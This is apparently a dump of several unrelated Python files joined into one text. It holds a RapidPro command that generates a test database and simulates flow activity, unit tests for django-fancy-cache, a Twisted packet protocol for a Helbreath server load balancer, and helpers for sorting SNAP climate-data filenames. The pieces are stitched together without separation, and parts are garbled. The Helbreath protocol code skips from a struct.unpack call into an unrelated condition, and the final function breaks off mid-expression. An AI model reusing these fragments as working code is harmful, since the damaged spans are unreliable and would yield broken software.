if command == self.COMMAND_GENERATE:\n self.handle_generate(kwargs[\'num_orgs\'], kwargs[\'num_contacts\'], kwargs[\'seed\'])\n else:\n self.handle_simulate(kwargs[\'num_runs\'])\n\n time_taken = time.time() - start\n self._log(""Completed in %d secs, peak memory usage: %d MiB\\n"" % (int(time_taken), int(self.peak_memory())))\n\n def handle_generate(self, num_orgs, num_contacts, seed):\n """"""\n Creates a clean database\n """"""\n seed = self.configure_random(num_orgs, seed)\n\n self._log(""Generating random base database (seed=%d)...\\n"" % seed)\n\n try:\n has_data = Org.objects.exists()\n except Exception: # pragma: no cover\n raise CommandError(""Run migrate command first to create database tables"")\n if has_data:\n raise CommandError(""Can\'t generate content in non-empty database."")\n\n self.batch_size = 5000\n\n # the timespan being modelled by this database\n self.db_ends_on = timezone.now()\n self.db_begins_on = self.db_ends_on - timedelta(days=CONTENT_AGE)\n\n # this is a new database so clear out redis\n self._log(""Clearing out Redis cache... "")\n r = get_redis_connection()\n r.flushdb()\n self._log(self.style.SUCCESS(""OK"") + \'\\n\')\n\n superuser = User.objects.create_superuser(""root"", dummy@email.com"", USER_PASSWORD)\n\n country, locations = self.load_locations(LOCATIONS_DUMP)\n orgs = self.create_orgs(superuser, country, num_orgs)\n self.create_users(orgs)\n self.create_channels(orgs)\n self.create_fields(orgs)\n self.create_groups(orgs)\n self.create_labels(orgs)\n self.create_flows(orgs)\n self.create_contacts(orgs, locations, num_contacts)\n\n def handle_simulate(self, num_runs):\n """"""\n Prepares to resume simulating flow activity on an existing database\n """"""\n self._log(""Resuming flow activity simulation on existing database...\\n"")\n\n orgs = list(Org.objects.order_by(\'id\'))\n if not orgs:\n raise CommandError(""Can\'t simulate activity on an empty database"")\n\n self.configure_random(len(orgs))\n\n # in real life Nexmo messages are throttled, but that\'s not necessary for this simulation\n del Channel.CHANNEL_SETTINGS[Channel.TYPE_NEXMO][\'max_tps\']\n\n inputs_by_flow_name = {f[\'name\']: f[\'templates\'] for f in FLOWS}\n\n self._log(""Preparing existing orgs... "")\n\n for org in orgs:\n flows = list(org.flows.order_by(\'id\'))\n for flow in flows:\n flow.input_templates = inputs_by_flow_name[flow.name]\n\n org.cache = {\n \'users\': list(org.get_org_users().order_by(\'id\')),\n \'channels\': list(org.channels.order_by(\'id\')),\n \'groups\': list(ContactGroup.user_groups.filter(org=org).order_by(\'id\')),\n \'flows\': flows,\n \'contacts\': list(org.org_contacts.values_list(\'id\', flat=True)), # only ids to save memory\n \'activity\': None\n }\n\n self._log(self.style.SUCCESS(""OK"") + \'\\n\')\n\n self.simulate_activity(orgs, num_runs)\n\n def configure_random(self, num_orgs, seed=None):\n if not seed:\n seed = random.randrange(0, 65536)\n\n self.random = random.Random(seed)\n\n # monkey patch uuid4 so it returns the same UUIDs for the same seed, see https://github.com/joke2k/faker/issues/484#issuecomment-287931101\n from temba.utils import models\n models.uuid4 = lambda: uuid.UUID(int=(self.random.getrandbits(128) | (1 << 63) | (1 << 78)) & (~(1 << 79) & ~(1 << 77) & ~(1 << 76) & ~(1 << 62)))\n\n # We want a variety of large and small orgs so when allocating content like contacts and messages, we apply a\n # bias toward the beginning orgs. if there are N orgs, then the amount of content the first org will be\n # allocated is (1/N) ^ (1/bias). This sets the bias so that the first org will get ~50% of the content:\n self.org_bias = math.log(1.0 / num_orgs, 0.5)\n\n return seed\n\n def load_locations(self, path):\n """"""\n Loads admin boundary records from the given dump of that table\n """"""\n self._log(""Loading locations from %s... "" % path)\n\n # load dump into current db with pg_restore\n db_config = settings.DATABASES[\'default\']\n try:\n check_call(\'export PGPASSWORD=%s && pg_restore -U%s -w -d %s %s\' %\n (db_config[\'PASSWORD\'], db_config[\'USER\'], db_config[\'NAME\'], path), shell=True)\n except CalledProcessError: # pragma: no cover\n raise CommandError(""Error occurred whilst calling pg_restore to load locations dump"")\n\n # fetch as tuples of (WARD, DISTRICT, STATE)\n wards = AdminBoundary.objects.filter(level=3).prefetch_related(\'parent\', \'parent__parent\')\n locations = [(w, w.parent, w.parent.parent) for w in wards]\n\n country = AdminBoundary.objects.filter(level=0).get()\n\n self._log(self.style.SUCCESS(""OK"") + \'\\n\')\n return country, locations\n\n def create_orgs(self, superuser, country, num_total):\n """"""\n Creates and initializes the orgs\n """"""\n self._log(""Creating %d orgs... "" % num_total)\n\n org_names = [\'%s %s\' % (o1, o2) for o2 in ORG_NAMES[1] for o1 in ORG_NAMES[0]]\n self.random.shuffle(org_names)\n\n orgs = []\n for o in range(num_total):\n orgs.append(Org(name=org_names[o % len(org_names)], timezone=self.random.choice(pytz.all_timezones),\n brand=\'rapidpro.io\', country=country,\n created_on=self.db_begins_on, created_by=superuser, modified_by=superuser))\n Org.objects.bulk_create(orgs)\n orgs = list(Org.objects.order_by(\'id\'))\n\n self._log(self.style.SUCCESS(""OK"") + ""\\nInitializing orgs... "")\n\n for o, org in enumerate(orgs):\n org.initialize(topup_size=max((1000 - o), 1) * 1000)\n\n # we\'ll cache some metadata on each org as it\'s created to save re-fetching things\n org.cache = {\n \'users\': [],\n \'fields\': {},\n \'groups\': [],\n \'system_groups\': {g.group_type: g for g in ContactGroup.system_groups.filter(org=org)},\n }\n\n self._log(self.style.SUCCESS(""OK"") + \'\\n\')\n return orgs\n\n def create_users(self, orgs):\n """"""\n Creates a user of each type for each org\n """"""\n self._log(""Creating %d users... "" % (len(orgs) * len(USERS)))\n\n # create users for each org\n for org in orgs:\n for u in USERS:\n user = User.objects.create_user(u[\'username\'] % org.id, u[\'email\'] % org.id, USER_PASSWORD)\n getattr(org, u[\'role\']).add(user)\n user.set_org(org)\n org.cache[\'users\'].append(user)\n\n self._log(self.style.SUCCESS(""OK"") + \'\\n\')\n\n def create_channels(self, orgs):\n """"""\n Creates the channels for each org\n """"""\n self._log(""Creating %d channels... "" % (len(orgs) * len(CHANNELS)))\n\n for org in orgs:\n user = org.cache[\'users\'][0]\n for c in CHANNELS:\n Channel.objects.create(org=org, name=c[\'name\'], channel_type=c[\'channel_type\'],\n address=c[\'address\'], schemes=[c[\'scheme\']],\n created_by=user, modified_by=user)\n\n self._log(self.style.SUCCESS(""OK"") + \'\\n\')\n\n def create_fields(self, orgs):\n """"""\n Creates the contact fields for each org\n """"""\n self._log(""Creating %d fields... "" % (len(orgs) * len(FIELDS)))\n\n for org in orgs:\n user = org.cache[\'users\'][0]\n for f in FIELDS:\n field = ContactField.objects.create(org=org, key=f[\'key\'], label=f[\'label\'],\n value_type=f[\'value_type\'], show_in_table=True,\n created_by=user, modified_by=user)\n org.cache[\'fields\'][f[\'key\']] = field\n\n self._log(self.style.SUCCESS(""OK"") + \'\\n\')\n\n def create_groups(self, orgs):\n """"""\n Creates the contact groups for each org\n """"""\n self._log(""Creating %d groups... "" % (len(orgs) * len(GROUPS)))\n\n for org in orgs:\n user = org.cache[\'users\'][0]\n for g in GROUPS:\n if g[\'query\']:\n group = ContactGroup.create_dynamic(org, user, g[\'name\'], g[\'query\'])\n else:\n group = ContactGroup.user_groups.create(org=org, name=g[\'name\'], created_by=user, modified_by=user)\n group.member = g[\'member\']\n group.count = 0\n org.cache[\'groups\'].append(group)\n\n self._log(self.style.SUCCESS(""OK"") + \'\\n\')\n\n def create_labels(self, orgs):\n """"""\n Creates the message labels for each org\n """"""\n self._log(""Creating %d labels... "" % (len(orgs) * len(LABELS)))\n\n for org in orgs:\n user = org.cache[\'users\'][0]\n for name in LABELS:\n Label.label_objects.create(org=org, name=name, created_by=user, modified_by=user)\n\n self._log(self.style.SUCCESS(""OK"") + \'\\n\')\n\n def create_flows(self, orgs):\n """"""\n Creates the flows for each org\n """"""\n self._log(""Creating %d flows... "" % (len(orgs) * len(FLOWS)))\n\n for org in orgs:\n user = org.cache[\'users\'][0]\n for f in FLOWS:\n with open(\'media/test_flows/\' + f[\'file\'], \'r\') as flow_file:\n org.import_app(json.load(flow_file), user)\n\n self._log(self.style.SUCCESS(""OK"") + \'\\n\')\n\n def create_contacts(self, orgs, locations, num_contacts):\n """"""\n Creates test and regular contacts for this database. Returns tuples of org, contact id and the preferred urn\n id to avoid trying to hold all contact and URN objects in memory.\n """"""\n group_counts = defaultdict(int)\n\n self._log(""Creating %d test contacts..."" % (len(orgs) * len(USERS)))\n\n for org in orgs:\n test_contacts = []\n for user in org.cache[\'users\']:\n test_contacts.append(Contact.get_test_contact(user))\n org.cache[\'test_contacts\'] = test_contacts\n\n self._log(self.style.SUCCESS(""OK"") + \'\\n\')\n self._log(""Creating %d regular contacts...\\n"" % num_contacts)\n\n # disable table triggers to speed up insertion and in the case of contact group m2m, avoid having an unsquashed\n # count row for every contact\n with DisableTriggersOn(Contact, ContactURN, Value, ContactGroup.contacts.through):\n names = [(\'%s %s\' % (c1, c2)).strip() for c2 in CONTACT_NAMES[1] for c1 in CONTACT_NAMES[0]]\n names = [n if n else None for n in names]\n\n batch_num = 1\n for index_batch in chunk_list(six.moves.xrange(num_contacts), self.batch_size):\n batch = []\n\n # generate flat representations and contact objects for this batch\n for c_index in index_batch: # pragma: no cover\n org = self.random_org(orgs)\n name = self.random_choice(names)\n location = self.random_choice(locations) if self.probability(CONTACT_HAS_FIELD_PROB) else None\n created_on = self.timeline_date(c_index / num_contacts)\n\n c = {\n \'org\': org,\n \'user\': org.cache[\'users\'][0],\n \'name\': name,\n \'groups\': [],\n \'tel\': \'+2507%08d\' % c_index if self.probability(CONTACT_HAS_TEL_PROB) else None,\n \'twitter\': \'%s%d\' % (name.replace(\' \', \'_\').lower() if name else \'tweep\', c_index) if self.probability(CONTACT_HAS_TWITTER_PROB) else None,\n \'gender\': self.random_choice((\'M\', \'F\')) if self.probability(CONTACT_HAS_FIELD_PROB) else None,\n \'age\': self.random.randint(16, 80) if self.probability(CONTACT_HAS_FIELD_PROB) else None,\n \'joined\': self.random_date() if self.probability(CONTACT_HAS_FIELD_PROB) else None,\n \'ward\': location[0] if location else None,\n \'district\': location[1] if location else None,\n \'state\': location[2] if location else None,\n \'language\': self.random_choice(CONTACT_LANGS),\n \'is_stopped\': self.probability(CONTACT_IS_STOPPED_PROB),\n \'is_blocked\': self.probability(CONTACT_IS_BLOCKED_PROB),\n \'is_active\': self.probability(1 - CONTACT_IS_DELETED_PROB),\n \'created_on\': created_on,\n \'modified_on\': self.random_date(created_on, self.db_ends_on),\n }\n\n # work out which system groups this contact belongs to\n if c[\'is_active\']:\n if not c[\'is_blocked\'] and not c[\'is_stopped\']:\n c[\'groups\'].append(org.cache[\'system_groups\'][ContactGroup.TYPE_ALL])\n if c[\'is_blocked\']:\n c[\'groups\'].append(org.cache[\'system_groups\'][ContactGroup.TYPE_BLOCKED])\n if c[\'is_stopped\']:\n c[\'groups\'].append(org.cache[\'system_groups\'][ContactGroup.TYPE_STOPPED])\n\n # let each user group decide if it is taking this contact\n for g in org.cache[\'groups\']:\n if g.member(c) if callable(g.member) else self.probability(g.member):\n c[\'groups\'].append(g)\n\n # track changes to group counts\n for g in c[\'groups\']:\n group_counts[g] += 1\n\n batch.append(c)\n\n self._create_contact_batch(batch)\n self._log("" > Created batch %d of %d\\n"" % (batch_num, max(num_contacts // self.batch_size, 1)))\n batch_num += 1\n\n # create group count records manually\n counts = []\n for group, count in group_counts.items():\n counts.append(ContactGroupCount(group=group, count=count, is_squashed=True))\n group.count = count\n ContactGroupCount.objects.bulk_create(counts)\n\n def _create_contact_batch(self, batch):\n """"""\n Bulk creates a batch of contacts from flat representations\n """"""\n for c in batch:\n c[\'object\'] = Contact(org=c[\'org\'], name=c[\'name\'], language=c[\'language\'],\n is_stopped=c[\'is_stopped\'], is_blocked=c[\'is_blocked\'],\n is_active=c[\'is_active\'],\n created_by=c[\'user\'], created_on=c[\'created_on\'],\n modified_by=c[\'user\'], modified_on=c[\'modified_on\'])\n Contact.objects.bulk_create([c[\'object\'] for c in batch])\n\n # now that contacts have pks, bulk create the actual URN, value and group membership objects\n batch_urns = []\n batch_values = []\n batch_memberships = []\n\n for c in batch:\n org = c[\'org\']\n c[\'urns\'] = []\n\n if c[\'tel\']:\n c[\'urns\'].append(ContactURN(org=org, contact=c[\'object\'], priority=50, scheme=TEL_SCHEME,\n path=c[\'tel\'], identity=URN.from_tel(c[\'tel\'])))\n if c[\'twitter\']:\n c[\'urns\'].append(ContactURN(org=org, contact=c[\'object\'], priority=50, scheme=TWITTER_SCHEME,\n path=c[\'twitter\'], identity=URN.from_twitter(c[\'twitter\'])))\n if c[\'gender\']:\n batch_values.append(Value(org=org, contact=c[\'object\'], contact_field=org.cache[\'fields\'][\'gender\'],\n string_value=c[\'gender\']))\n if c[\'age\']:\n batch_values.append(Value(org=org, contact=c[\'object\'], contact_field=org.cache[\'fields\'][\'age\'],\n string_value=str(c[\'age\']), decimal_value=c[\'age\']))\n if c[\'joined\']:\n batch_values.append(Value(org=org, contact=c[\'object\'], contact_field=org.cache[\'fields\'][\'joined\'],\n string_value=datetime_to_str(c[\'joined\']), datetime_value=c[\'joined\']))\n if c[\'ward\']:\n batch_values.append(Value(org=org, contact=c[\'object\'], contact_field=org.cache[\'fields\'][\'ward\'],\n string_value=c[\'ward\'].name, location_value=c[\'ward\']))\n if c[\'district\']:\n batch_values.append(Value(org=org, contact=c[\'object\'], contact_field=org.cache[\'fields\'][\'district\'],\n string_value=c[\'district\'].name, location_value=c[\'district\']))\n if c[\'state\']:\n batch_values.append(Value(org=org, contact=c[\'object\'], contact_field=org.cache[\'fields\'][\'state\'],\n string_value=c[\'state\'].name, location_value=c[\'state\']))\n for g in c[\'groups\']:\n batch_memberships.append(ContactGroup.contacts.through(contact=c[\'object\'], contactgroup=g))\n\n batch_urns += c[\'urns\']\n\n ContactURN.objects.bulk_create(batch_urns)\n Value.objects.bulk_create(batch_values)\n ContactGroup.contacts.through.objects.bulk_create(batch_memberships)\n\n def simulate_activity(self, orgs, num_runs):\n self._log(""Starting simulation. Ctrl+C to cancel...\\n"")\n\n runs = 0\n while runs < num_runs:\n try:\n with transaction.atomic():\n # make sure every org has an active flow\n for org in orgs:\n if not org.cache[\'activity\']:\n self.start_flow_activity(org)\n\n with transaction.atomic():\n org = self.random_org(orgs)\n\n if self.probability(0.1):\n self.create_unsolicited_incoming(org)\n else:\n self.create_flow_run(org)\n runs += 1\n\n except KeyboardInterrupt:\n self._log(""Shutting down...\\n"")\n break\n\n squash_channelcounts()\n squash_flowpathcounts()\n squash_flowruncounts()\n prune_recentmessages()\n squash_topupcredits()\n squash_labelcounts()\n\n def start_flow_activity(self, org):\n assert not org.cache[\'activity\']\n\n user = org.cache[\'users\'][0]\n flow = self.random_choice(org.cache[\'flows\'])\n\n if self.probability(0.9):\n # start a random group using a flow start\n group = self.random_choice(org.cache[\'groups\'])\n contacts_started = list(group.contacts.values_list(\'id\', flat=True))\n\n self._log("" > Starting flow %s for group %s (%d) in org %s\\n""\n % (flow.name, group.name, len(contacts_started), org.name))\n\n start = FlowStart.create(flow, user, groups=[group], restart_participants=True)\n start.start()\n else:\n # start a random individual without a flow start\n if not org.cache[\'contacts\']:\n return\n\n contact = Contact.objects.get(id=self.random_choice(org.cache[\'contacts\']))\n contacts_started = [contact.id]\n\n self._log("" > Starting flow %s for contact #%d in org %s\\n"" % (flow.name, contact.id, org.name))\n\n flow.start([], [contact], restart_participants=True)\n\n org.cache[\'activity\'] = {\'flow\': flow, \'unresponded\': contacts_started, \'started\': list(contacts_started)}\n\n def end_flow_activity(self, org):\n self._log("" > Ending flow %s for in org %s\\n"" % (org.cache[\'activity\'][\'flow\'].name, org.name))\n\n org.cache[\'activity\'] = None\n\n runs = FlowRun.objects.filter(org=org, is_active=True)\n FlowRun.bulk_exit(runs, FlowRun.EXIT_TYPE_EXPIRED)\n\n def create_flow_run(self, org):\n activity = org.cache[\'activity\']\n flow = activity[\'flow\']\n\n if activity[\'unresponded\']:\n contact_id = self.random_choice(activity[\'unresponded\'])\n activity[\'unresponded\'].remove(contact_id)\n\n contact = Contact.objects.get(id=contact_id)\n urn = contact.urns.first()\n\n if urn:\n self._log("" > Receiving flow responses for flow %s in org %s\\n"" % (flow.name, flow.org.name))\n\n inputs = self.random_choice(flow.input_templates)\n\n for text in inputs:\n channel = flow.org.cache[\'channels\'][0]\n Msg.create_incoming(channel, six.text_type(urn), text)\n\n # if more than 10% of contacts have responded, consider flow activity over\n if len(activity[\'unresponded\']) <= (len(activity[\'started\']) * 0.9):\n self.end_flow_activity(flow.org)\n\n def create_unsolicited_incoming(self, org):\n if not org.cache[\'contacts\']:\n return\n\n self._log("" > Receiving unsolicited incoming message in org %s\\n"" % org.name)\n\n available_contacts = list(set(org.cache[\'contacts\']) - set(org.cache[\'activity\'][\'started\']))\n if available_contacts:\n contact = Contact.objects.get(id=self.random_choice(available_contacts))\n channel = self.random_choice(org.cache[\'channels\'])\n urn = contact.urns.first()\n if urn:\n text = \' \'.join([self.random_choice(l) for l in INBOX_MESSAGES])\n Msg.create_incoming(channel, six.text_type(urn), text)\n\n def probability(self, prob):\n return self.random.random() < prob\n\n def random_choice(self, seq, bias=1.0):\n if not seq:\n raise ValueError(""Can\'t select random item from empty sequence"")\n\n return seq[int(math.pow(self.random.random(), bias) * len(seq))]\n\n def weighted_choice(self, seq, weights):\n r = self.random.random() * sum(weights)\n cum_weight = 0.0\n\n for i, item in enumerate(seq):\n cum_weight += weights[i]\n if r < cum_weight or (i == len(seq) - 1):\n return item\n\n def random_org(self, orgs):\n """"""\n Returns a random org with bias toward the orgs with the lowest indexes\n """"""\n return self.random_choice(orgs, bias=self.org_bias)\n\n def random_date(self, start=None, end=None):\n if not end:\n end = timezone.now()\n if not start:\n start = end - timedelta(days=365)\n\n if start == end:\n return end\n\n return ms_to_datetime(self.random.randrange(datetime_to_ms(start), datetime_to_ms(end)))\n\n def timeline_date(self, dist):\n """"""\n Converts a 0..1 distance into a date on this database\'s overall timeline\n """"""\n seconds_span = (self.db_ends_on - self.db_begins_on).total_seconds()\n\n return self.db_begins_on + timedelta(seconds=(seconds_span * dist))\n\n @staticmethod\n def peak_memory():\n rusage_denom = 1024\n if sys.platform == \'darwin\':\n # OSX gives value in bytes, other OSes in kilobytes\n rusage_denom *= rusage_denom\n return resource.getrusage(resource.RUSAGE_SELF).ru_maxrss / rusage_denom\n\n def _log(self, text):\n self.stdout.write(text, ending=\'\')\n self.stdout.flush()\n\n\nclass DisableTriggersOn(object):\n """"""\n Helper context manager for temporarily disabling database triggers for a given model\n """"""\n def __init__(self, *models):\n self.tables = [m._meta.db_table for m in models]\n\n def __enter__(self):\n with connection.cursor() as cursor:\n for table in self.tables:\n cursor.execute(\'ALTER TABLE %s DISABLE TRIGGER ALL;\' % table)\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n with connection.cursor() as cursor:\n for table in self.tables:\n cursor.execute(\'ALTER TABLE %s ENABLE TRIGGER ALL;\' % table)\n', 'import unittest\nimport re\nfrom nose.tools import eq_, ok_\nfrom django.test.client import RequestFactory\nfrom django.core.cache import cache\nfrom fancy_cache.memory import find_urls\n\nfrom . import views\n\n\nclass TestViews(unittest.TestCase):\n\n def setUp(self):\n self.factory = RequestFactory()\n\n def tearDown(self):\n cache.clear()\n\n def test_render_home1(self):\n request = self.factory.get(\'/anything\')\n\n response = views.home(request)\n eq_(response.status_code, 200)\n ok_(re.findall(\'Random:\\w+\', response.content.decode(""utf8"")))\n random_string_1 = re.findall(\'Random:(\\w+)\', response.content.decode(""utf8""))[0]\n\n # do it again\n response = views.home(request)\n eq_(response.status_code, 200)\n random_string_2 = re.findall(\'Random:(\\w+)\', response.content.decode(""utf8""))[0]\n eq_(random_string_1, random_string_2)\n\n def test_render_home2(self):\n authenticated = RequestFactory(AUTH_USER=\'peter\')\n request = self.factory.get(\'/2\')\n\n response = views.home2(request)\n eq_(response.status_code, 200)\n ok_(re.findall(\'Random:\\w+\', response.content.decode(""utf8"")))\n random_string_1 = re.findall(\'Random:(\\w+)\', response.content.decode(""utf8""))[0]\n\n # do it again\n response = views.home2(request)\n eq_(response.status_code, 200)\n random_string_2 = re.findall(\'Random:(\\w+)\', response.content.decode(""utf8""))[0]\n eq_(random_string_1, random_string_2)\n\n # do it again, but with a hint to disable cache\n request = authenticated.get(\'/2\')\n response = views.home2(request)\n eq_(response.status_code, 200)\n random_string_2 = re.findall(\'Random:(\\w+)\', response.content.decode(""utf8""))[0]\n ok_(random_string_1 != random_string_2)\n\n def test_render_home3(self):\n request = self.factory.get(\'/anything\')\n\n response = views.home3(request)\n eq_(response.status_code, 200)\n ok_(re.findall(\'Random:\\w+\', response.content.decode(""utf8"")))\n random_string_1 = re.findall(\'Random:(\\w+)\', response.content.decode(""utf8""))[0]\n ok_(\'In your HTML\' in response.content.decode(""utf8""))\n extra_random_1 = re.findall(\'In your HTML:(\\w+)\', response.content.decode(""utf8""))[0]\n\n response = views.home3(request)\n eq_(response.status_code, 200)\n ok_(re.findall(\'Random:\\w+\', response.content.decode(""utf8"")))\n random_string_2 = re.findall(\'Random:(\\w+)\', response.content.decode(""utf8""))[0]\n extra_random_2 = re.findall(\'In your HTML:(\\w+)\', response.content.decode(""utf8""))[0]\n ok_(\'In your HTML\' in response.content.decode(""utf8""))\n eq_(random_string_1, random_string_2)\n # the post_process_response is only called once\n eq_(extra_random_1, extra_random_2)\n\n def test_render_home3_no_cache(self):\n factory = RequestFactory(AUTH_USER=\'peter\')\n request = factory.get(\'/3\')\n\n response = views.home3(request)\n eq_(response.status_code, 200)\n ok_(re.findall(\'Random:\\w+\', response.content.decode(""utf8"")))\n ok_(\'In your HTML\' not in response.content.decode(""utf8""))\n\n def test_render_home4(self):\n request = self.factory.get(\'/4\')\n\n response = views.home4(request)\n eq_(response.status_code, 200)\n ok_(re.findall(\'Random:\\w+\', response.content.decode(""utf8"")))\n random_string_1 = re.findall(\'Random:(\\w+)\', response.content.decode(""utf8""))[0]\n ok_(\'In your HTML\' in response.content.decode(""utf8""))\n extra_random_1 = re.findall(\'In your HTML:(\\w+)\', response.content.decode(""utf8""))[0]\n\n response = views.home4(request)\n eq_(response.status_code, 200)\n ok_(re.findall(\'Random:\\w+\', response.content.decode(""utf8"")))\n random_string_2 = re.findall(\'Random:(\\w+)\', response.content.decode(""utf8""))[0]\n extra_random_2 = re.findall(\'In your HTML:(\\w+)\', response.content.decode(""utf8""))[0]\n ok_(\'In your HTML\' in response.content.decode(""utf8""))\n eq_(random_string_1, random_string_2)\n # the post_process_response is now called every time\n ok_(extra_random_1 != extra_random_2)\n\n def test_render_home5(self):\n request = self.factory.get(\'/4\', {\'foo\': \'bar\'})\n response = views.home5(request)\n eq_(response.status_code, 200)\n ok_(re.findall(\'Random:\\w+\', response.content.decode(""utf8"")))\n random_string_1 = re.findall(\'Random:(\\w+)\', response.content.decode(""utf8""))[0]\n\n request = self.factory.get(\'/4\', {\'foo\': \'baz\'})\n response = views.home5(request)\n eq_(response.status_code, 200)\n ok_(re.findall(\'Random:\\w+\', response.content.decode(""utf8"")))\n random_string_2 = re.findall(\'Random:(\\w+)\', response.content.decode(""utf8""))[0]\n ok_(random_string_1 != random_string_2)\n\n request = self.factory.get(\'/4\', {\'foo\': \'baz\', \'other\': \'junk\'})\n response = views.home5(request)\n eq_(response.status_code, 200)\n ok_(re.findall(\'Random:\\w+\', response.content.decode(""utf8"")))\n random_string_3 = re.findall(\'Random:(\\w+)\', response.content.decode(""utf8""))[0]\n eq_(random_string_2, random_string_3)\n\n def test_render_home5bis(self):\n request = self.factory.get(\'/4\', {\'foo\': \'bar\'})\n response = views.home5bis(request)\n eq_(response.status_code, 200)\n ok_(re.findall(\'Random:\\w+\', response.content.decode(""utf8"")))\n random_string_1 = re.findall(\'Random:(\\w+)\', response.content.decode(""utf8""))[0]\n\n request = self.factory.get(\'/4\', {\'foo\': \'baz\'})\n response = views.home5bis(request)\n eq_(response.status_code, 200)\n ok_(re.findall(\'Random:\\w+\', response.content.decode(""utf8"")))\n random_string_2 = re.findall(\'Random:(\\w+)\', response.content.decode(""utf8""))[0]\n ok_(random_string_1 != random_string_2)\n\n request = self.factory.get(\'/4\', {\'foo\': \'baz\', \'bar\': \'foo\'})\n response = views.home5bis(request)\n eq_(response.status_code, 200)\n ok_(re.findall(\'Random:\\w+\', response.content.decode(""utf8"")))\n random_string_3 = re.findall(\'Random:(\\w+)\', response.content.decode(""utf8""))[0]\n eq_(random_string_2, random_string_3)\n\n def test_remember_stats_all_urls(self):\n request = self.factory.get(\'/anything\')\n response = views.home6(request)\n eq_(response.status_code, 200)\n\n # now ask the memory thing\n match, = find_urls(urls=[\'/anything\'])\n eq_(match[0], \'/anything\')\n eq_(match[2][\'hits\'], 0)\n eq_(match[2][\'misses\'], 1)\n\n # second time\n response = views.home6(request)\n eq_(response.status_code, 200)\n match, = find_urls(urls=[\'/anything\'])\n eq_(match[0], \'/anything\')\n eq_(match[2][\'hits\'], 1)\n eq_(match[2][\'misses\'], 1)\n\n def test_remember_stats_all_urls_looong_url(self):\n request = self.factory.get(\n \'PI:KEY\'\n \'test/that/things/work/with/long/urls/too\',\n {\n \'line1\': \'Bad luck, wind been blowing at my back\',\n \'line2\': ""I was born to bring trouble to wherever I\'m at"",\n \'line3\': ""Got the number thirteen, tattooed on my neck"",\n \'line4\': ""When the ink starts to itch, "",\n \'line5\': ""then the black will turn to red"",\n }\n )\n response = views.home6(request)\n eq_(response.status_code, 200)\n\n # now ask the memory thing\n match, = find_urls()\n ok_(match[0].startswith(\'/something/really\'))\n eq_(match[2][\'hits\'], 0)\n eq_(match[2][\'misses\'], 1)\n\n # second time\n response = views.home6(request)\n eq_(response.status_code, 200)\n match, = find_urls([])\n ok_(match[0].startswith(\'/something/really\'))\n eq_(match[2][\'hits\'], 1)\n eq_(match[2][\'misses\'], 1)\n', ""#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n#\thb_balancer\n#\tHigh performance load balancer between Helbreath World Servers.\n#\n#\tCopyright (C) 2012 Michał Papierski dummy@email.com\n\n#\tThis program is free software: you can redistribute it and/or modify\n#\tit under the terms of the GNU Affero General Public License as\n#\tpublished by the Free Software Foundation, either version 3 of the\n#\tLicense, or (at your option) any later version.\n\n#\tThis program is distributed in the hope that it will be useful,\n#\tbut WITHOUT ANY WARRANTY; without even the implied warranty of\n#\tMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n#\tGNU Affero General Public License for more details.\n\n#\tYou should have received a copy of the GNU Affero General Public License\n#\talong with this program. If not, see .\n#\n\nimport struct\nimport random\nimport logging\n\nfrom twisted.internet import reactor\nfrom twisted.protocols.stateful import StatefulProtocol\nfrom twisted.python import log\n\nfrom packets import Packets\n\nclass BaseHelbreathProtocol(StatefulProtocol):\n\t''' Basic Helbreath Protocol '''\n\t\n\tdef getInitialState(self):\n\t\t'''\n\t\t\tProtocol overview:\n\t\t\t[Key unsigned byte] [Size unsigned short] [Data Size-bytes]\n\t\t'''\n\t\treturn (self.get_key, 1)\n\t\t\t\t\n\tdef get_key(self, data):\n\t\t''' Get key '''\n\t\tself.key, = struct.unpack(' 0:\n\t\t\t# Decode\n\t\t\tdata = list(data)\n\t\t\tfor i in range(len(data)):\n\t\t\t\tdata[i] = chr(((ord(data[i]) ^ (self.key ^ (self.data_size - 3 - i))) - (i ^ self.key)) % 256)\n\t\t\tdata = ''.join(data)\n\t\t\n\t\t# Pass decoded data\n\t\tself.raw_data(data)\n\t\t\n\t\treturn (self.get_key, 1)\n\t\n\tdef send_message(self, data):\n\t\t''' Send a Helbreath Packet data '''\n\t\tkey = random.randint(0, 255)\n\t\tif key > 0:\n\t\t\t# Encode\n\t\t\tdata = list(data)\n\t\t\tfor i in range(len(data)):\n\t\t\t\tdata[i] = chr(((ord(data[i]) + (i ^ key)) ^ (key ^ (len(data) - i))) % 256)\n\t\t\tdata = ''.join(data)\n\t\tself.transport.write(struct.pack('_MM_YYYY.tif'. If sorted using base\n\tPythons sort/sorted functions, things will be sorted by the first char\n\tof the month, which makes thing go 1, 11, ... which sucks for timeseries\n\tthis sorts it properly following SNAP standards as the default settings.\n\n\tARGUMENTS:\n\t----------\n\tfiles = [list] list of `str` pathnames to be sorted by month and year. usually from glob.glob.\n\tsplit_on = [str] `str` character to split the filename on. default:'_', SNAP standard.\n\telem_month = [int] slice element from resultant split filename list. Follows Python slicing syntax.\n\t\tdefault:-2. For SNAP standard.\n\telem_year = [int] slice element from resultant split filename list. Follows Python slicing syntax.\n\t\tdefault:-1. For SNAP standard.\n\n\tRETURNS:\n\t--------\n\tsorted `list` by month and year ascending. \n\n\t'''\n\timport pandas as pd\n\tmonths = [ int(os.path.basename( fn ).split('.')[0].split( split_on )[elem_month]) for fn in files ]\n\tyears = [ int(os.path.basename( fn ).split('.')[0].split( split_on )[elem_year]) for fn in files ]\n\tdf = pd.DataFrame( {'fn':files, 'month':months, 'year':years} )\n\tdf_sorted = df.sort_values( ['year', 'month' ] )\n\treturn df_sorted.fn.tolist()\ndef only_years( files, begin=1901, end=2100, split_on='_', elem_year=-1 ):\n\t'''\n\treturn new list of filenames where they are truncated to begin:end\n\n\tARGUMENTS:\n\t----------\n\tfiles = [list] list of `str` pathnames to be sorted by month and year. usually from glob.glob.\n\tbegin = [int] four digit integer year of the begin time default:1901\n\tend = [int] four digit integer year of the end time default:2100\n\tsplit_on = [str] `str` character to split the filename on. default:'_', SNAP standard.\n\telem_year = [int] slice element from resultant split filename list. Follows Python slicing syntax.\n\t\tdefault:-1. For SNAP standard.\n\n\tRETURNS:\n\t--------\n\tsliced `list` to begin and end year.\n\t'''\n\timport pandas as pd\n\tyears = [ int(os.path.basename( fn ).split('.')[0].split( split_on )[elem_year]) for fn in files ]\n\tdf = pd.DataFrame( { 'fn':files, 'year':years } )\n\tdf_slice = df[ (df.year >= begin ) & (df.year <= end ) 